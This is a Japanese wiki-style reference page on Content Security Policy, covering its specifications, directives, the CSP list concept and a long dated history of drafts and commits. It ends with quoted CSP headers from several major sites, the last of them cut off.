[138] [DFN[CSP]] ([DFN[[RUBYB[内容セキュリティーポリシー]@en[content security policy]]]])
は、当該[[Webページ]]が満たすべき[[セキュリティー]]上の制約を記述するものです。
[[CSP]] を使うことで、 [[XSS]] などの [[Webアプリケーション]]の[[脆弱性]]の影響範囲を限定するなど、
[[Webサイト]]の安全性を向上させることができます。

* 仕様書

[REFS[
- [117] [CITE@en[Content Security Policy Level 3]] ([TIME[2016-02-29 23:20:13 +09:00]] 版) <https://w3c.github.io/webappsec-csp/>
-- [48] 旧 [CITE@en[Content Security Policy]] ([TIME[2015-05-05 20:49:34 +09:00]] 版) <https://w3c.github.io/webappsec/specs/content-security-policy/>
- [118] [CITE@en[Content Security Policy: Document Features]] ([TIME[2016-02-29 23:20:13 +09:00]] 版) <https://w3c.github.io/webappsec-csp/document/>
- [59] [CITE@en-GB-x-hixie[HTML Standard]] ([TIME[2015-09-18 02:18:44 +09:00]] 版) <https://html.spec.whatwg.org/#attr-meta-http-equiv-content-security-policy>
- [82] [CITE@en-GB-x-hixie[HTML Standard]] ([TIME[2015-11-06 03:51:21 +09:00]] 版) <https://html.spec.whatwg.org/#concept-document-csp-list>
- [87] [CITE@en-GB-x-hixie[HTML Standard]] ([TIME[2015-11-06 03:51:21 +09:00]] 版) <https://html.spec.whatwg.org/#concept-workerglobalscope-csp-list>
- [112] [CITE@en[RFC 7762 - Initial Assignment for the Content Security Policy Directives Registry]]
([TIME[2016-01-29 12:26:08 +09:00]] 版)
<https://tools.ietf.org/html/rfc7762>
- [111] [CITE[Content Security Policy Directives]] ([TIME[2015-11-25 05:20:01 +09:00]] 版) <https://www.iana.org/assignments/content-security-policy-directives/content-security-policy-directives.xhtml>
]REFS]

* 用法

[174] [[Webページ]]で利用する機能 (アクセスする範囲) が元々限られている場合に、
悪意ある第三者の攻撃でそれ以外の機能が利用されようとするとき、
([[Webページ]]に脆弱性があって本来それが防げないとしても) 
[[CSP]] で利用する範囲を予め指定しておいたなら、攻撃を防ぐことができます。

[175] [[UGC]] 系の [[Webアプリケーション]]などで[[利用者]]による任意の入力を
[[Webページ]]に掲載したい場合に、悪意ある[[利用者]]が攻撃目的の入力を与えても他の[[利用者]]に危害を加えることがないよう、
[[CSP]] を使って認められる範囲を指定することができます。

* 指令

[71] 次の[[指令]]があります。
[FIG(middle list)[
- [CODE(HTTP)@en[[[block-all-mixed-content]]]]
- [CODE(HTTP)@en[[[report-uri]]]]
- [CODE(HTTP)@en[[[upgrade-insecure-requests]]]]
- [CODE(HTTP)@en[sandbox]]

[HISTORY[
- [CODE[cookie-scope]]
]HISTORY]
]FIG]

-*-*-

[113] (なぜか) [[IANA登録簿]]があります [SRC[>>112, >>111]]。

[176] しかし古い [[CSP2]] のものしか登録されていません。 
[[W3C勧告]]になったものしか登録されないのでしょうか。
[[CSP3]] で全体的に大きな変更が加わっていますし、
[[CSP]] 本体以外にも色々な[[仕様書]]があるのに、
それらが登録されていないのでは登録簿の意味がありません。

* CSP リスト

[83] [[文書]] [SRC[>>82]] や [CODE(DOMi)@en[[[WorkerGlobalScope]]]] [SRC[>>87]]
は、[DFN[[F[[RUBYB[[[CSPリスト]]]@en[CSP list]]]]]]を持ちます。

[84] これは適用される [[CSP]] のオブジェクトのリストです。初期状態では空です。 [SRC[>>82]]

[86] [[navigate]] では[[[CODE(DOMi)@en[Document]]のCSPリストの初期化]]により値が設定されます。

[88] [[run a worker]] では[[応答]]の[[CSPリスト]]が引き継がれます。

[85] [[overridden reload]] や [CODE(HTMLa)@en[[[srcdoc]]]]
[[属性]]の読み込みでは、元の[[文書]]の[F[[[CSPリスト]]]]が引き継がれます。

* 関連

[139] [[fetch]] や [[navigate]] や[[砂箱化]]と深く関係しています。

* 歴史

[1] [CITE@en[Security/CSP - MozillaWiki]]
([TIME[2009-10-09 22:03:58 +09:00]] 版)
<https://wiki.mozilla.org/Security/CSP>

[2] [CITE@en[Security/CSP/Spec - MozillaWiki]]
([TIME[2009-11-04 04:19:11 +09:00]] 版)
<https://wiki.mozilla.org/Security/CSP/Spec>

[3] [CITE@en[Security/CSP/Specification - MozillaWiki]]
([TIME[2010-05-22 03:46:34 +09:00]] 版)
<https://wiki.mozilla.org/Security/CSP/Specification>

[4] [CITE@en[XSS mitigation in browsers]]
( ([[Adam Barth]] 著, [TIME[2011-01-20 07:42:47 +09:00]] 版))
<http://lists.w3.org/Archives/Public/public-web-security/2011Jan/0002.html>

[5] [CITE@en[Content Security Policy]]
( ([TIME[2011-12-01 01:03:34 +09:00]] 版))
<http://www.w3.org/TR/2011/WD-CSP-20111129/>

[6] [CITE[IRC logs: freenode / #whatwg / 20111206]]
( ([TIME[2011-12-06 21:54:13 +09:00]] 版))
<http://krijnhoetmer.nl/irc-logs/whatwg/20111206>

[7] [CITE['''['''whatwg''']''' CSP sandbox directive integration with HTML]]
([TIME[2011-12-07 09:36:37 +09:00]] 版)
<http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2011-December/034071.html>

[8] [CITE@en[Content Security Policy]]
( ([TIME[2012-04-14 10:44:44 +09:00]] 版))
<http://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html>

[9] [CITE@en[draft-gondrom-websec-csp-header-00 - HTTP Header Content Security Policy]]
( ([TIME[2012-03-06 21:39:17 +09:00]] 版))
<http://tools.ietf.org/html/draft-gondrom-websec-csp-header-00>

[10] [CITE[Content Security Policy (CSP) - Google Chrome Extensions - Google Code]]
( ([TIME[2012-07-04 21:12:09 +09:00]] 版))
<http://code.google.com/chrome/extensions/contentSecurityPolicy.html>

[11] [CITE@en[Content Security Policy 1.0]]
( ([TIME[2012-07-08 08:24:03 +09:00]] 版))
<http://www.w3.org/TR/2012/WD-CSP-20120710/>

[12] [CITE@en[Content Security Policy 1.0]]
( ([TIME[2012-11-15 02:39:08 +09:00]] 版))
<http://www.w3.org/TR/2012/CR-CSP-20121115/>

[13] [CITE@en[User Interface Safety Directives for Content Security Policy]]
( ([TIME[2012-11-20 22:47:37 +09:00]] 版))
<http://www.w3.org/TR/2012/WD-UISafety-20121120/>

[14] [CITE[Content Security Policy 1.1]]
( ([TIME[2012-12-13 23:00:55 +09:00]] 版))
<http://www.w3.org/TR/2012/WD-CSP11-20121213/>

[15] [CITE[Chromium Blog: Chrome 25 Beta: Content Security Policy and Shadow DOM]]
( ([TIME[2013-01-16 03:52:16 +09:00]] 版))
<http://blog.chromium.org/2013/01/content-security-policy-and-shadow-dom.html>

[16] [CITE@en[Runtime and Security Model for Web Applications]]
( ([TIME[2013-03-21 23:02:32 +09:00]] 版))
<http://www.w3.org/TR/2013/WD-runtime-20130321/#csp-policy>

[17] [CITE@en[User Interface Security Directives for Content Security Policy]]
( ([TIME[2013-05-22 21:37:57 +09:00]] 版))
<http://www.w3.org/TR/2013/WD-UISecurity-20130523/>

[18] [CITE[Chromium Blog: Chrome 28 Beta: A more immersive web, everywhere]]
( ([TIME[2013-05-23 17:42:48 +09:00]] 版))
<http://blog.chromium.org/2013/05/chrome-28-beta-more-immersive-web.html>

[19] [CITE@en[Content Security Policy 1.1]]
( ([TIME[2013-06-04 06:35:02 +09:00]] 版))
<http://www.w3.org/TR/2013/WD-CSP11-20130604/>

[20] [CITE[Content Security Policy (CSP) - Google Chrome]]
( ([TIME[2013-10-13 01:58:37 +09:00]] 版))
<http://developer.chrome.com/extensions/contentSecurityPolicy.html>

[21] [CITE@en-US[Default CSP restrictions - Security | MDN]]
( ([TIME[2013-10-01 06:35:59 +09:00]] 版))
<https://developer.mozilla.org/en/docs/Security/CSP/Default_CSP_restrictions>

[22] [CITE@en-US[Introducing Content Security Policy - Security | MDN]]
( ([TIME[2013-09-30 19:27:42 +09:00]] 版))
<https://developer.mozilla.org/en-US/docs/Security/CSP/Introducing_Content_Security_Policy>

[23] [CITE@en[''''''[''''''webappsec'''''']'''''' Proposal: Closing the feature set of CSP 1.1]]
( ([[Brad Hill]] 著, [TIME[2013-09-10 09:14:02 +09:00]] 版))
<http://lists.w3.org/Archives/Public/public-webappsec/2013Sep/0019.html>

[24] [CITE@en[Content Security Policy 1.1]]
( ([TIME[2014-01-16 14:18:10 +09:00]] 版))
<http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html>

[25] [CITE[Bug 2494 – Add hooks for CSP]]
( ([TIME[2014-02-05 07:24:56 +09:00]] 版))
<https://bugs.ecmascript.org/show_bug.cgi?id=2494>

[26] [CITE@en[Content Security Policy 1.1]]
( ([TIME[2014-02-11 06:15:48 +09:00]] 版))
<http://www.w3.org/TR/2014/WD-CSP11-20140211/>

[27] [CITE@en[User Interface Security Directives for Content Security Policy]]
( ([TIME[2014-03-15 06:10:22 +09:00]] 版))
<http://www.w3.org/TR/2014/WD-UISecurity-20140318/>

[28] [CITE@en[User Interface Security Directives for Content Security Policy]]
( ([TIME[2014-04-25 10:54:40 +09:00]] 版))
<https://dvcs.w3.org/hg/user-interface-safety/raw-file/tip/user-interface-safety.html>

[29] [CITE[Clarify MIX and CSP hooks a bit · 682f68d · whatwg/fetch]]
( ([TIME[2014-06-16 03:02:02 +09:00]] 版))
<https://github.com/whatwg/fetch/commit/682f68d5f0cce7f9637a8f6d9450b514ed276f9b>

[30] [CITE[Put MIX/CSP hooks in switch. Put second MIX check before tainting. · 567fe8a · whatwg/fetch]]
( ([TIME[2014-06-16 03:05:42 +09:00]] 版))
<https://github.com/whatwg/fetch/commit/567fe8ad5f1804efdefa7aa273f2a366b223c70e>

[31] [CITE@en[Content Security Policy Level 2]]
( ([TIME[2014-07-03 04:53:53 +09:00]] 版))
<http://www.w3.org/TR/2014/WD-CSP2-20140703/>

[32] [CITE@en["Why is CSP failing? Trends and Challenges in CSP Adoption"]]
( ([[Oda, Terri]] 著, [TIME[2014-07-24 03:26:19 +09:00]] 版))
<http://lists.w3.org/Archives/Public/public-webappsec/2014Jul/0100.html>

[33] ( ([TIME[2014-07-15 00:50:45 +09:00]] 版))
<http://mweissbacher.com/publications/csp_raid.pdf>

[34] [CITE@en[''''''[''''''webappsec'''''']'''''' Call for Consensus: CSP Level 2 to Candidate Recommendation]]
( ([[Brad Hill]] 著, [TIME[2014-10-21 08:02:34 +09:00]] 版))
<http://lists.w3.org/Archives/Public/public-webappsec/2014Oct/0063.html>

[35] [CITE@en[''''''[''''''webappsec'''''']'''''' Call for Consensus: Stop work on Content Security Policy  1.0, transition to WG Note]]
( ([[Brad Hill]] 著, [TIME[2014-10-21 08:13:56 +09:00]] 版))
<http://lists.w3.org/Archives/Public/public-webappsec/2014Oct/0064.html>

[36] [CITE@en[CSP3: Starting on DOM API strawman. · 92b8dd4 · w3c/webappsec]]
( ([TIME[2014-11-04 03:23:06 +09:00]] 版))
<https://github.com/w3c/webappsec/commit/92b8dd4778ad1a237e5b5be015f9482bd3ad2ff4>

[37] [CITE@en[CSP3: DOM API Strawman]]
( ([[Mike West]] 著, [TIME[2014-11-03 22:24:45 +09:00]] 版))
<http://lists.w3.org/Archives/Public/public-webappsec/2014Nov/0005.html>

[38] [CITE@en[''''''[''''''webappsec'''''']'''''' Rechartering: CSP Level 3]]
( ([[Brad Hill]] 著, [TIME[2014-11-10 09:02:46 +09:00]] 版))
<http://lists.w3.org/Archives/Public/public-webappsec/2014Nov/0126.html>

[39] [CITE@en[Official Gmail Blog: Reject the unexpected - Content Security Policy in Gmail]]
( ([TIME[2014-12-19 08:00:09 +09:00]] 版))
<http://gmailblog.blogspot.jp/2014/12/reject-unexpected-content-security.html>

[40] [CITE@en[Fix the order of CSP, HSTS, Mixed Content, and Referrer https://www.w3.o... · b8c2c49 · whatwg/fetch]]
([TIME[2015-01-28 18:20:53 +09:00]] 版)
<https://github.com/whatwg/fetch/commit/b8c2c4964c233cd3616042c04e2c14e0ff25485d>

[41] [CITE@en[Re: CfC: Transition CSP2 to CR.]]
([[Mike West]] 著, [TIME[2015-02-08 02:05:21 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Feb/0124.html>

[42] [CITE@en[Content Security Policy 1.0]]
( ([TIME[2015-02-19 06:00:25 +09:00]] 版))
<http://www.w3.org/TR/2015/NOTE-CSP1-20150219/>

[43] [CITE@en[Content Security Policy Level 2]]
( ([TIME[2015-02-17 00:13:08 +09:00]] 版))
<http://www.w3.org/TR/2015/CR-CSP2-20150219/>

[44] [CITE@en[Content Security Policy Pinning]]
( ([TIME[2015-02-24 21:59:42 +09:00]] 版))
<http://www.w3.org/TR/2015/WD-csp-pinning-20150226/>

[45] [CITE@en[Content Security Policy Pinning]]
( ([TIME[2015-02-26 20:26:19 +09:00]] 版))
<https://w3c.github.io/webappsec/specs/csp-pinning/>

[46] [CITE[Content Security Policy]]
([TIME[2011-12-29 07:11:55 +09:00]] 版)
<http://people.mozilla.org/~bsterne/content-security-policy/index.html>

[47] [CITE@en[Security/CSP/Spec - MozillaWiki]]
([TIME[2015-03-31 11:52:15 +09:00]] 版)
<https://wiki.mozilla.org/Security/CSP/Spec>

[49] [CITE@en[Store a url list for requests and responses so CSP can do the right t… · whatwg/fetch@1d8173a]]
([TIME[2015-06-12 12:18:00 +09:00]] 版)
<https://github.com/whatwg/fetch/commit/1d8173afffcffad2587f2922381878939c9cebea>

[50] [CITE@en[Add the response CSP check as open issue. Fixes #77. · whatwg/fetch@baeb561]]
([TIME[2015-07-15 12:37:36 +09:00]] 版)
<https://github.com/whatwg/fetch/commit/baeb561384ee353b13a2ca0b2a31fd79b769caa2>

[51] [CITE@en[CSP: Blob URLs in new windows.]]
([[Mike West]] 著, [TIME[2015-07-20 13:40:23 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Jul/0126.html>

[FIG(quote)[
[FIGCAPTION[
[52] [CITE@en[Re: CfC: Mixed Content to PR; deadline July 6th.]]
([[Mike West]] 著, [TIME[2015-07-21 03:38:29 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Jul/0144.html>
]FIGCAPTION]

> Hammering out scope for CSP3 is on my list for this quarter. Rewriting
> enforcement and monitoring in terms of Fetch is totally going to happen.
> Sorry it's taken so long.
> 

]FIG]


[53] [CITE@en[Content Security Policy Level 2]]
( ([TIME[2015-07-21 00:31:23 +09:00]] 版))
<http://www.w3.org/TR/2015/CR-CSP2-20150721/>

[54] [CITE@en[Runtime and Security Model for Web Applications]]
([TIME[2015-08-04 19:31:42 +09:00]] 版)
<http://www.w3.org/TR/2015/NOTE-runtime-20150806/#csp-policy>

[55] [CITE@en[RE: CfC: CSP2 to PR; deadline Aug 18th.]]
([[Crispin Cowan]] 著, [TIME[2015-08-14 08:47:59 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Aug/0069.html>

[56] [CITE@en[JSON CSP]]
([TIME[2015-08-15 11:55:12 +09:00]] 版)
<https://gist.github.com/jonathanKingston/5699b440f608960dc089>

[57] [CITE@en[JSON representation of CSP policies]]
([[Jonathan Kingston]] 著, [TIME[2015-08-15 07:20:24 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Aug/0073.html>

[58] [CITE@en[Re: JSON representation of CSP policies]]
([[Mike West]] 著, [TIME[2015-08-17 22:48:08 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Aug/0079.html>

[60] [CITE@en[Fix #88: add the 'Content-Security-Policy' pragma directive · whatwg/html@5064a62]]
([TIME[2015-09-19 13:39:47 +09:00]] 版)
<https://github.com/whatwg/html/commit/5064a629f22bef29839ab4dc6f1ceef17f010bc5>

[61] [CITE@en[CSP-COOKIES: If nothing else, this will be a good argument aabout doc… · w3c/webappsec@8e1be6f]]
([TIME[2015-09-26 11:40:04 +09:00]] 版)
<https://github.com/w3c/webappsec/commit/8e1be6ff6407b71443b2efe5b21d9455aa607ef8>

[62] [CITE@en[CSP-COOKIES: Cleaning up for wider review. · w3c/webappsec@ee2d941]]
([TIME[2015-09-27 14:23:46 +09:00]] 版)
<https://github.com/w3c/webappsec/commit/ee2d9412e651eba82f5c2fc3d628b6d0e55c21be>

[63] [CITE@en[CSP3 as a polylithic set of modules?]]
([[Mike West]] 著, [TIME[2015-09-27 01:29:34 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Sep/0210.html>

[64] [CITE@en[Content Security Policy Pinning]]
([TIME[2015-10-06 19:45:04 +09:00]] 版)
<https://w3c.github.io/webappsec-csp/pinning/>

[65] [CITE@en[w3c/webappsec-csp]]
([TIME[2015-10-06 23:20:06 +09:00]] 版)
<https://github.com/w3c/webappsec-csp>

[66] [CITE[CSP: Defining the CH-CSP Client Hint. · 049a3c9 · w3c/webappsec]]
( ([TIME[2014-06-13 15:16:48 +09:00]] 版))
<https://github.com/w3c/webappsec/commit/049a3c94817770487e21d6151b135bca4b19ba46>

[67] [CITE@en[CSP: Drop the 'CH-' prefix on the request header. · 548a228 · w3c/webappsec]]
( ([TIME[2014-09-02 08:17:30 +09:00]] 版))
<https://github.com/w3c/webappsec/commit/548a228a5349b0eef8a14e048500e8eb3dbf3674>

[68] [CITE@en[CSP2: Note the issue the 'CSP' header was meant to solve. · w3c/webappsec@5233fe8]]
([TIME[2015-08-13 11:53:34 +09:00]] 版)
<https://github.com/w3c/webappsec/commit/5233fe8e75fd5b155135c6eca35fb48e685c14e5>


[69] [CITE@en[draft-west-webappsec-csp-reg-00 - Content Security Policy Directive Registry]]
([TIME[2015-10-07 03:48:16 +09:00]] 版)
<https://tools.ietf.org/html/draft-west-webappsec-csp-reg-00>

[70] [CITE@en[Hey, look at that. A strawman IANA registry. · w3c/webappsec-csp@224f8e6]]
([TIME[2015-10-07 13:49:13 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/224f8e6ac414119260af0fc8a0f8326b94bac655>

[72] [CITE@en[763879 – (CSP) implement blocking of inline stylesheets]]
([TIME[2015-10-09 21:54:26 +09:00]] 版)
<https://bugzilla.mozilla.org/show_bug.cgi?id=763879>

[73] [CITE@en[Clear response's CSP list before setting. · w3c/webappsec-csp@0545ae0]]
([TIME[2015-10-15 11:55:17 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/0545ae08d6c74788f006e07b2b991bbf925c9691>

[74] [CITE@en[Extensions should bypass CSP. · w3c/webappsec-csp@1b7b2c4]]
([TIME[2015-10-15 11:56:03 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/1b7b2c401ed1dc2b435cb3e68313ced19c88d597>

[75] [CITE@en[Update Fetch with shiny, new CSP hooks · whatwg/fetch@8ce550b]]
([TIME[2015-10-16 14:30:15 +09:00]] 版)
<https://github.com/whatwg/fetch/commit/8ce550b53c53e2b6e8376373b94d66b2eeada8f8>

[76] [CITE@en[Drop Fetch issues after https://github.com/whatwg/fetch/commit/8ce550… · w3c/webappsec-csp@c2b6452]]
([TIME[2015-10-16 14:31:34 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/c2b64522fb6f4cb4f683344ee3cd890dfdcc515d>

[77] [CITE@en[Update CSP links · whatwg/html@7e8a536]]
([TIME[2015-10-22 11:44:39 +09:00]] 版)
<https://github.com/whatwg/html/commit/7e8a5367d1e0d9c1b7e84d2c86e7821af0ff167a>

[FIG(quote)[
[FIGCAPTION[
[78] [CITE@en[Upgrade Insecure Requests]]
([TIME[2015-10-07 03:24:10 +09:00]] 版)
<https://w3c.github.io/webappsec-upgrade-insecure-requests/#reporting-upgrades>
]FIGCAPTION]

> Upgrading insecure requests MUST not interfere with an authors' ability to track down requests that would be insecure in a user agent that does not support upgrades. To that end, upgrades MUST be performed after evaluating request against all monitored security policies, but before evaluating request against all enforced policies.

]FIG]


[FIG(quote)[
[FIGCAPTION[
[79] [CITE@en[Upgrade Insecure Requests]]
([TIME[2015-10-07 03:24:10 +09:00]] 版)
<https://w3c.github.io/webappsec-upgrade-insecure-requests/#violation-report-target>
]FIGCAPTION]

> When sending a violation report for an upgraded resource, user agents MUST target the Document or Worker that triggered the request, rather than the Document or Worker on which the upgrade-insecure-requests directive was set. Due to §3.3 Policy Inheritance, the latter might be a cross-origin ancestor of the former, and sending violation reports to that set of reporting endpoints could leak data in unexpected ways.
> Likewise, the SecurityPolicyViolationEvent MUST NOT target any Document other than the one which triggered the request, for the same reasons.

]FIG]


[80] [CITE@en[Allow upgrades from explicitly insecure expressions · w3c/webappsec-csp@0e81d81]]
([TIME[2015-10-29 12:41:01 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/0e81d81b64c42ca3c81c048161162b9697ff7b60>

[81] [CITE@en[Use the URL from the response, if it has one · whatwg/fetch@ed37f5e]]
([TIME[2015-11-05 17:18:28 +09:00]] 版)
<https://github.com/whatwg/fetch/commit/ed37f5e4cf0ec6615f93b8a575d7349b977ffc3a>

[89] [CITE@en[Split reporting and enforcement for Fetch. · w3c/webappsec-csp@6647d2d]]
([TIME[2015-11-08 15:43:35 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/6647d2de191283e94cec1059411f536e6d6b95b5>

[90] [CITE@en[Separate 'report-only' and 'enforce' CSP execution · whatwg/fetch@a58871a]]
([TIME[2015-11-08 15:50:14 +09:00]] 版)
<https://github.com/whatwg/fetch/commit/a58871a92cbf9304ea4e661f31efb9f2b78bf44b>

[91] [CITE@en[Call out to CSP's inline element hooks · whatwg/html@ee3486e]]
([TIME[2015-11-08 16:32:16 +09:00]] 版)
<https://github.com/whatwg/html/commit/ee3486eb129bc350b5ca684d0c91dff23453ac1a>

[92] [CITE@en[Move to CSP2. · w3c/webappsec-csp@2a08d9b]]
([TIME[2015-11-21 16:09:45 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/2a08d9b2ee2a5cea8f0bd2bae1f7faedd9a700e7>

[93] [CITE@en[Updating EMBEDDED for a potential FPWD. · w3c/webappsec-csp@7260140]]
([TIME[2015-12-01 11:36:34 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/726014018c622455f72cd434a8622e784322318d>

[94] [CITE@en[CfC: CSP Embedded Enforcement to FPWD; deadline Dec. 7th.]]
([[Mike West]] 著, [TIME[2015-11-30 19:14:35 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Nov/0070.html>

[95] [CITE@en[Working on the split. · w3c/webappsec-csp@72c7f3e]]
([TIME[2015-12-03 14:41:14 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/72c7f3ecc3eae190bd5df656cb5e8dbc4abb5a9a>

[96] [CITE@en[new CSP draft.]]
([[Mike West]] 著, [TIME[2015-12-04 22:31:03 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Dec/0025.html>

[97] [CITE@en[Close #384: add CSP hooks to handle inline events and style · whatwg/html@920c918]]
([TIME[2015-12-15 20:07:56 +09:00]] 版)
<https://github.com/whatwg/html/commit/920c9183a7990968ecac1aeedae22391f3438791>

[98] [CITE@en[Content Security Policy: Cookie Controls]]
( ([TIME[2015-12-13 11:02:51 +09:00]] 版))
<http://www.w3.org/TR/2015/WD-csp-cookies-20151215/>

[99] [CITE@en[Content Security Policy: Embedded Enforcement]]
( ([TIME[2015-12-13 11:05:51 +09:00]] 版))
<http://www.w3.org/TR/2015/WD-csp-embedded-enforcement-20151215/>

[100] [CITE@en[Call for Exclusions: Content Security Policy: Cookie Controls and  Content Security Policy: Embedded Enforcement]]
([[Xueyuan Jia]] 著, [TIME[2015-12-15 17:14:45 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Dec/0034.html>

[101] [CITE@en[CfC: CSP3 to FPWD; deadline January 15th.]]
([[Mike West]] 著, [TIME[2016-01-08 18:59:12 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2016Jan/0034.html>

[102] [CITE@en[s/serialized policy/serialized CSP/g · w3c/webappsec-csp@17c18c0]]
([TIME[2016-01-13 12:09:31 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/17c18c04cbe94a0796e353aa99d972cb9021b3cf>

[103] [CITE@en[Update xrefs for CSP sandbox & frame-ancestors · whatwg/html@088f4f2]]
([TIME[2016-01-21 12:17:02 +09:00]] 版)
<https://github.com/whatwg/html/commit/088f4f210541f8c131fb92c4f331c40f4b6b3768>

[104] [CITE@en[Content Security Policy Level 3]]
( ([TIME[2016-01-26 01:08:50 +09:00]] 版))
<https://www.w3.org/TR/2016/WD-CSP3-20160126/>

[105] [CITE@en[IANA: AUTH48 version of the RFC. · w3c/webappsec-csp@1bfbb97]]
([TIME[2016-01-28 23:14:29 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/1bfbb97a12e6338c563e19bcfd2582291ab33e80>

[106] [CITE@en[Fix links to CSP list initialization algorithms · whatwg/html@59d9ae1]]
([TIME[2016-01-30 12:17:28 +09:00]] 版)
<https://github.com/whatwg/html/commit/59d9ae1ed8df16dbea7eb6906e333d12d8ceeecf>

[107] [CITE@en[CSP: Fix workers' CSP list initialization. · whatwg/html@05f9f32]]
([TIME[2016-01-30 13:30:44 +09:00]] 版)
<https://github.com/whatwg/html/commit/05f9f3266d6050b8b299ec365fdc63d5eab5b2b3>

[108] [CITE@en[No CSP report-uri|frame-ancestors|sandbox in meta · whatwg/html@3947072]]
([TIME[2016-01-30 20:55:24 +09:00]] 版)
<https://github.com/whatwg/html/commit/39470724136a366bab4e893efd889a513d61cc3e>

[109] [CITE@en[No CSP report-uri|frame-ancestors|sandbox in meta · whatwg/html@3947072]]
([TIME[2016-01-30 20:55:24 +09:00]] 版)
<https://github.com/whatwg/html/commit/39470724136a366bab4e893efd889a513d61cc3e>

[110] [CITE@en[RFC 7762 - Initial Assignment for the Content Security Policy Directives Registry]]
([TIME[2016-01-29 12:26:08 +09:00]] 版)
<https://tools.ietf.org/html/rfc7762>

[114] [CITE@en[FYI: RFC7762 established a registry of CSP directives]]
([[Mike West]] 著, [TIME[2016-02-12 21:07:55 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2016Feb/0047.html>

[115] [CITE@en[IANA bits. · w3c/webappsec-upgrade-insecure-requests@1d4db1a]]
([TIME[2016-02-14 00:56:36 +09:00]] 版)
<https://github.com/w3c/webappsec-upgrade-insecure-requests/commit/1d4db1a5be26ea83caa45e9bbebbb00a100c4102>

[116] [CITE@en[Making it easier to deploy CSP.]]
([[Mike West]] 著, [TIME[2016-02-12 22:56:58 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2016Feb/0048.html>

[119] [CITE@en[Call for Exclusions (Update): Content Security Policy: Cookie  Controls; Content Security Policy: Embedded Enforcement]]
([[Xueyuan Jia]] 著, [TIME[2016-03-15 23:47:16 +09:00]] 版)
<https://lists.w3.org/Archives/Public/public-webappsec/2016Mar/0033.html>

[120] [CITE@en[We're not going to enable 'sandbox' in '<meta>'. · w3c/webappsec-csp@8ca78f0]]
([TIME[2016-04-06 16:32:17 +09:00]] 版)
<https://github.com/w3c/webappsec-csp/commit/8ca78f0ed12bbbde0a11c4d58fb936ce0a25f9d7>

[121] [CITE@en[CSP Request Header and CORS preflight fetch. · Issue #52 · whatwg/fetch]]
([TIME[2016-04-11 12:51:01 +09:00]] 版)
<https://github.com/whatwg/fetch/issues/52>

[FIG(quote)[
[FIGCAPTION[
[122] [CITE[CloudFlare - The web performance & security company]]
([TIME[2016-04-16 06:06:26 +09:00]] 版)
<https://www.cloudflare.com/>
]FIGCAPTION]

> content-security-policy:default-src 'self' https://*; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://* data:; img-src 'self' https://* data:; style-src 'self' 'unsafe-inline' https://*; font-src 'self' https://* data:; frame-src https://*; connect-src 'self' data: https://*

]FIG]


[FIG(quote)[
[FIGCAPTION[
[123] [CITE@en[GitHub]]
([TIME[2016-04-18 00:53:37 +09:00]] 版)
<https://github.com/>
]FIGCAPTION]

> Content-Security-Policy:default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src render.githubusercontent.com; connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com github-cloud.s3.amazonaws.com api.braintreegateway.com client-analytics.braintreegateway.com wss://live.github.com; font-src assets-cdn.github.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com checkout.paypal.com *.githubusercontent.com; media-src 'none'; object-src assets-cdn.github.com; plugin-types application/x-shockwave-flash; script-src assets-cdn.github.com; style-src 'unsafe-inline' assets-cdn.github.com

]FIG]


[FIG(quote)[
[FIGCAPTION[
[124] [CITE@ja[Twitter]]
([TIME[2016-04-18 00:56:15 +09:00]] 版)
<https://twitter.com/>
]FIGCAPTION]

> content-security-policy:script-src https://connect.facebook.net https://cm.g.doubleclick.net https://ssl.google-analytics.com https://graph.facebook.com https://twitter.com 'unsafe-eval' https://*.twimg.com https://api.twitter.com https://analytics.twitter.com https://publish.twitter.com https://ton.twitter.com https://syndication.twitter.com https://www.google.com https://t.tellapart.com https://platform.twitter.com 'nonce-ukbsoXB8DeM97dTLyRPKOw==' https://www.google-analytics.com 'self'; frame-ancestors 'self'; font-src https://twitter.com https://*.twimg.com data: https://ton.twitter.com https://fonts.gstatic.com https://maxcdn.bootstrapcdn.com https://netdna.bootstrapcdn.com 'self'; media-src https://twitter.com https://*.twimg.com https://ton.twitter.com blob: 'self'; connect-src https://graph.facebook.com https://*.giphy.com https://pay.twitter.com https://analytics.twitter.com https://media.riffsy.com https://upload.twitter.com https://api.mapbox.com 'self'; style-src https://fonts.googleapis.com https://twitter.com https://*.twimg.com https://translate.googleapis.com https://ton.twitter.com 'unsafe-inline' https://platform.twitter.com https://maxcdn.bootstrapcdn.com https://netdna.bootstrapcdn.com 'self'; object-src https://twitter.com 